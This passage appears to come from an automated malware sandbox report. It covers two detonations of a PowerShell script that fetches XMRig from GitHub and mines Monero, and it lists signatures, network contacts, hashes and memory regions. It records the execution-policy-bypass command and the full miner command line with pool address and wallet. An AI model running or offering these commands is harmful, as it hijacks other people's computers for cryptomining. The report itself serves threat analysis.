powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
Network
Files
memory/2244-4-0x000007FEF54FE000-0x000007FEF54FF000-memory.dmp
memory/2244-5-0x000000001B330000-0x000000001B612000-memory.dmp
memory/2244-6-0x0000000002390000-0x0000000002398000-memory.dmp
memory/2244-7-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp
memory/2244-8-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp
memory/2244-9-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp
memory/2244-10-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp
memory/2244-11-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp
memory/2244-12-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp
Analysis: behavioral28
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win11-20240508-en
Max time kernel
296s
Max time network
286s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1656 wrote to memory of 4556 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1656 wrote to memory of 4556 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| IE | 52.111.236.22:443 | tcp |
Files
memory/1656-0-0x00007FFA20DB3000-0x00007FFA20DB5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uvtuswkd.0u3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1656-9-0x00000232C95B0000-0x00000232C95D2000-memory.dmp
memory/1656-10-0x00007FFA20DB0000-0x00007FFA21872000-memory.dmp
memory/1656-11-0x00007FFA20DB0000-0x00007FFA21872000-memory.dmp
memory/1656-12-0x00007FFA20DB0000-0x00007FFA21872000-memory.dmp
memory/1656-13-0x00007FFA20DB0000-0x00007FFA21872000-memory.dmp
memory/1656-14-0x00007FFA20DB0000-0x00007FFA21872000-memory.dmp
memory/1656-15-0x00007FFA20DB0000-0x00007FFA21872000-memory.dmp
memory/1656-17-0x00000232C9620000-0x00000232C9632000-memory.dmp
memory/1656-18-0x00000232C9600000-0x00000232C960A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4556-49-0x0000027D8A8E0000-0x0000027D8A900000-memory.dmp
memory/4556-50-0x0000027D8A930000-0x0000027D8A950000-memory.dmp
memory/4556-51-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-54-0x0000027D8C230000-0x0000027D8C250000-memory.dmp
memory/4556-53-0x0000027D8C210000-0x0000027D8C230000-memory.dmp
memory/4556-52-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-55-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-56-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-58-0x0000027D8C230000-0x0000027D8C250000-memory.dmp
memory/4556-57-0x0000027D8C210000-0x0000027D8C230000-memory.dmp
memory/4556-59-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-60-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-61-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-62-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-63-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-64-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-65-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-66-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-67-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-68-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-69-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-70-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-71-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-72-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-73-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-74-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-75-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-76-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-77-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-78-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-79-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
memory/4556-80-0x00007FF7DFC00000-0x00007FF7E0833000-memory.dmp
Analysis: behavioral32
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win11-20240426-en
Max time kernel
298s
Max time network
262s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3096 wrote to memory of 1084 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3096 wrote to memory of 1084 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/3096-0-0x00007FFBF9313000-0x00007FFBF9315000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mymcrsga.53d.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3096-9-0x00000258B0010000-0x00000258B0032000-memory.dmp
memory/3096-10-0x00007FFBF9310000-0x00007FFBF9DD2000-memory.dmp
memory/3096-11-0x00007FFBF9310000-0x00007FFBF9DD2000-memory.dmp
memory/3096-12-0x00007FFBF9310000-0x00007FFBF9DD2000-memory.dmp
memory/3096-13-0x00007FFBF9310000-0x00007FFBF9DD2000-memory.dmp
memory/3096-14-0x00007FFBF9310000-0x00007FFBF9DD2000-memory.dmp
memory/3096-15-0x00007FFBF9310000-0x00007FFBF9DD2000-memory.dmp
memory/3096-18-0x00000258B03E0000-0x00000258B03EA000-memory.dmp
memory/3096-17-0x00000258B03F0000-0x00000258B0402000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1084-49-0x0000016404C30000-0x0000016404C50000-memory.dmp
memory/1084-50-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-52-0x0000016406530000-0x0000016406550000-memory.dmp
memory/1084-51-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-53-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-55-0x0000016499120000-0x0000016499140000-memory.dmp
memory/1084-54-0x0000016499140000-0x0000016499160000-memory.dmp
memory/1084-56-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-57-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-58-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-60-0x0000016499120000-0x0000016499140000-memory.dmp
memory/1084-59-0x0000016499140000-0x0000016499160000-memory.dmp
memory/1084-61-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-62-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-63-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-64-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-65-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-66-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-67-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-68-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-69-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-70-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-71-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-72-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-73-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-74-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-75-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-76-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-77-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-78-0x00007FF61C950000-0x00007FF61D583000-memory.dmp
memory/1084-79-0x00007FF61C950000-0x00007FF61D583000-memory.dmp